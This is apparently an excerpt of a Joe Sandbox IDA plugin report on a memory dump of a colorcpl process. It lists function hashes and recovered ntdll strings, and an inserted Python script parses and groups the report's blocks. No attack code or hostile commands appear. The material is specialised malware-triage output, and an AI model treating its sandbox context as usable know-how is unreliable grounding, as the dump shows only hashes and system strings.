                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                    • Instruction ID: d159260bd9cc47f9739ac411ea846f7b144f0fd5a7c051e2dd6816b6dd600ab9
                                                                                                    • Opcode Fuzzy Hash: 5fd49143fa49102544c2963eb9d090727d6c92543d1f0f36e433bd1cea946303
                                                                                                    • Instruction Fuzzy Hash: FAB01232C11580CFCF02DF40DA00B197332FB40720F254850A00017920C338F802CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction ID: 1627670364bebc66080de02f8542e74ac6891be69eb347d07c447c82b01ab2d1
                                                                                                    • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                    • Instruction Fuzzy Hash: EDA0113A022A80ABCB02AB00CA00B00B320BB00B20FE008A0A000028208228A8008A00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E6A46FC
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E6A4787
                                                                                                    • ExecuteOptions, xrefs: 1E6A46A0
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E6A4655
                                                                                                    • Execute=1, xrefs: 1E6A4713
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E6A4742
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E6A4725
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 0-484625025
                                                                                                    • Opcode ID: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
                                                                                                    • Instruction ID: 6c3ce5855a4311064135f8c87dfbd15a0af000e59fe27311348c9bfad91e243c
                                                                                                    • Opcode Fuzzy Hash: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
                                                                                                    • Instruction Fuzzy Hash: 01516735A11259BBEF008BA4DC94FAA7BA9EF4D300F8007A9D504EB190FB35BE41CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
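
Blocks in this listing follow one fixed text layout (section header, "•" items, then a "Uniqueness Score" line closing the block), so they can be parsed mechanically to group functions that share the same Opcode ID and Instruction ID and to search the strings the plugin attached to each function. The Python below is an added example written for this page, not code from Joe Sandbox or its IDA plugin; its sample input is constructed from values in the listing above (the first block's string list is abbreviated, and the second block is deliberately repeated), and the record and field names are the example's own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample in the layout of this report's IDA Plugin blocks. Values are
# taken from the listing; the second block is repeated to show duplicate grouping.
SAMPLE = """\
Strings
• ExecuteOptions, xrefs: 1E6A46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E6A4725
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
• Instruction ID: 6c3ce5855a4311064135f8c87dfbd15a0af000e59fe27311348c9bfad91e243c
• Opcode Fuzzy Hash: f91dcc8c5593fff84d0345b327db120e2c9abf4d77c353b478295e8064176417
• Instruction Fuzzy Hash: 01516735A11259BBEF008BA4DC94FAA7BA9EF4D300F8007A9D504EB190FB35BE41CB54
Uniqueness

Uniqueness Score: -1.00%

""" + 2 * """\
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
• Instruction ID: 1627670364bebc66080de02f8542e74ac6891be69eb347d07c447c82b01ab2d1
• Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
• Instruction Fuzzy Hash: EDA0113A022A80ABCB02AB00CA00B00B320BB00B20FE008A0A000028208228A8008A00
Uniqueness

Uniqueness Score: -1.00%

"""

XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(?P<score>-?[\d.]+)%$")

# Hypothetical record type for one function block (names are this example's own).
@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""
    source_file: str = ""
    snapshot_file: str = ""
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    uniqueness: Optional[float] = None
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref address)
    apis: List[str] = field(default_factory=list)

# "• Key: value" items map onto record fields; list sections are handled separately.
KEY_TO_ATTR = {
    "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
    "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy",
    "Source File": "source_file", "Snapshot File": "snapshot_file",
    "API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
}

def parse_report(text: str) -> List[FunctionRecord]:
    """Split the plugin listing into one record per block (closed by its score line)."""
    records: List[FunctionRecord] = []
    current, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SCORE_RE.match(line)
        if m:                                   # score line terminates the block
            current.uniqueness = float(m.group("score"))
            records.append(current)
            current, section = FunctionRecord(), None
            continue
        if not line.startswith("•"):            # any bare line is a section header
            section = line
            continue
        item = line[1:].strip()
        if section == "Strings":                # "<text>, xrefs: <addr>"
            x = XREF_RE.match(item)
            current.strings.append((x.group("text"), x.group("addr")) if x else (item, ""))
        elif section == "APIs":
            current.apis.append(item)
        else:                                   # split at the first colon only
            key, _, value = item.partition(":")
            attr = KEY_TO_ATTR.get(key.strip())
            if attr:
                setattr(current, attr, value.strip())
    return records

def group_identical(records: List[FunctionRecord]) -> Dict[Tuple[str, str], List[FunctionRecord]]:
    """Group blocks whose Opcode ID and Instruction ID both match (byte-identical code)."""
    groups: Dict[Tuple[str, str], List[FunctionRecord]] = defaultdict(list)
    for r in records:
        groups[(r.opcode_id, r.instruction_id)].append(r)
    return dict(groups)

def find_by_string(records: List[FunctionRecord], needle: str) -> List[FunctionRecord]:
    """Return the blocks whose attached strings contain the given substring."""
    return [r for r in records if any(needle in text for text, _ in r.strings)]

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    for key, members in group_identical(recs).items():
        print(f"{key[0][:12]}... x{len(members)}  strings={len(members[0].strings)}")
```

Run against a full report export, `group_identical` collapses repeated blocks into one entry per distinct function body, and `find_by_string` locates the block that carries a string of interest (for example the ntdll `Execute=1` message above) together with the xref addresses the plugin recorded for it.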

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm
                                                                                                    • String ID: +$-$0$0
                                                                                                    • API String ID: 1302938615-699404926
                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction ID: c6cd33ebbd08f783cff5f0c2d9a1fcb18fcf5b19e0746291b810655d6a0d76e4
                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                    • Instruction Fuzzy Hash: C381C270E152498EEF04CF68C8A17EEBBB3AF46320F94475ADB63A7295C7349940CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E6A02BD
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E6A02E7
                                                                                                    • RTL: Re-Waiting, xrefs: 1E6A031E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                    • API String ID: 0-2474120054
                                                                                                    • Opcode ID: 7e99cc1e0bfe686d8bc44ea8f2c09b072617ac2c601a77a13eae634b6c160e37
                                                                                                    • Instruction ID: 1e65901a6066a053771bc27bda96a3ec6079ab5be71a6dbfeedad77316708d71
                                                                                                    • Opcode Fuzzy Hash: 7e99cc1e0bfe686d8bc44ea8f2c09b072617ac2c601a77a13eae634b6c160e37
                                                                                                    • Instruction Fuzzy Hash: A8E1AF30A047829FD711CF28C894B5ABBE2AF85354F904B2DE5A58B3E1D775E984CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 1E6A7B7F
                                                                                                    • RTL: Resource at %p, xrefs: 1E6A7B8E
                                                                                                    • RTL: Re-Waiting, xrefs: 1E6A7BAC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                    • API String ID: 0-871070163
                                                                                                    • Opcode ID: e5d506ce87e45b9542ea412c20912ad556d7fe5d5178a216074600726bbfc4c7
                                                                                                    • Instruction ID: f0922d452ff38505f19dac15811ec20a784ae80eae5225e158604b2565eb6c21
                                                                                                    • Opcode Fuzzy Hash: e5d506ce87e45b9542ea412c20912ad556d7fe5d5178a216074600726bbfc4c7
                                                                                                    • Instruction Fuzzy Hash: D641FD35B117428FC710CE29CC40B5AB7E6EF89720F800B2DE99A9B290DB31F805CB95
Uniqueness
Uniqueness Score: -1.00%
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E6A728C
Strings
• RTL: Resource at %p, xrefs: 1E6A72A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 1E6A7294
• RTL: Re-Waiting, xrefs: 1E6A72C1
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2404040114.000000001E600000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1e600000_colorcpl.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Uniqueness
Uniqueness Score: -1.00%